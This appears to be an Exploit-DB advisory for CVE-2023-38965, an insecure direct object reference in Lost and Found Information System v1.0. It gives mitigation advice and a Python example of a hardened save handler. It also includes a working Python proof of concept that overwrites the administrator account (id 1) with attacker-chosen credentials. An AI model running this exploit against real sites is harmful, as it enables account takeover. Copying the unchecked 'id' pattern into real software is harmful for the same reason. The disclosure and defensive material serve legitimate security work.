vendor: Lost and Found Information System
by: OR4NG.M4N
CVSS: 8.1 (CRITICAL)
CWE: 639, Insecure Direct Object Reference (IDOR)
Product Name: Lost and Found Information System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2023-38965
CPE: a:lost_and_found_information_system:lost_and_found_information_system:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2023

Lost and Found Information System v1.0 – Insecure Direct Object Reference leads to Account Takeover

The Lost and Found Information System v1.0 is vulnerable to an Insecure Direct Object Reference (IDOR) attack, which can be exploited by an authenticated attacker to take over user accounts. By manipulating the 'id' parameter in the POST request to '/classes/Users.php?f=save', an attacker can modify user information and potentially gain unauthorized access to other user accounts. This vulnerability has been assigned CVE-2023-38965.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper access controls and authorization checks to ensure that users can only modify their own accounts. Additionally, sensitive user data should be encrypted and protected to prevent unauthorized access.
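The authorization check recommended above, shown as an added example (not code from the application or from the exploit author): a Python model of the save handler with the vulnerable logic beside a hardened version. The names `Session`, `save_user`, `save_user_vulnerable`, the role values and the sample records are assumptions made for illustration.

```python
from dataclasses import dataclass
from typing import Optional

ADMIN, STAFF = 1, 2  # assumed role values, not taken from the application
EDITABLE = {"firstname", "middlename", "lastname", "username", "password"}

class Forbidden(Exception):
    """Raised when the session may not modify the requested record."""

@dataclass(frozen=True)
class Session:
    user_id: Optional[int]  # None means no authenticated session
    role: int = STAFF

def save_user_vulnerable(session, form, users):
    """IDOR: the record to update is chosen only by the client-supplied 'id'."""
    target = int(form["id"])
    users[target].update({k: v for k, v in form.items() if k in EDITABLE})
    return target

def save_user(session, form, users):
    """Hardened: the target is bound to the session; only admins may name another id."""
    if session.user_id is None:
        raise Forbidden("login required")
    raw = form.get("id") or str(session.user_id)
    if not (raw.isascii() and raw.isdigit()):
        raise Forbidden("malformed id")
    target = int(raw)
    if target != session.user_id and session.role != ADMIN:
        raise Forbidden("session user may not edit another account")
    if target not in users:
        raise Forbidden("no such user")
    # Only allow-listed fields are copied; a real handler would also hash the password.
    users[target].update({k: v for k, v in form.items() if k in EDITABLE})
    return target

def demo():
    # Constructed records: id 1 is the administrator, id 5 a regular account.
    users = {1: {"username": "admin"}, 5: {"username": "bob"}}
    form = {"id": "1", "firstname": "a", "middlename": "", "lastname": "b",
            "username": "bob2", "password": "new"}  # same fields as the save request
    bob = Session(user_id=5)
    try:
        save_user(bob, form, users)
        blocked = False
    except Forbidden:
        blocked = True
    own = save_user(bob, dict(form, id="5"), users)  # editing one's own record still works
    return blocked, users[1]["username"], own, users[5]["username"]
```

The same ownership check belongs on every endpoint that takes a record identifier from the request, not only on the save action.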

Exploit-DB raw data:

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over 
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

Python p0c :

import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()


url = args.url + '/classes/Users.php?f=save'


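# Form fields sent to the save endpoint. 'id' selects which user record
# is updated; this PoC hard-codes id 1.
data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data)
# A "1" anywhere in the response body is treated as success.
if b"1" in response.content: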
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")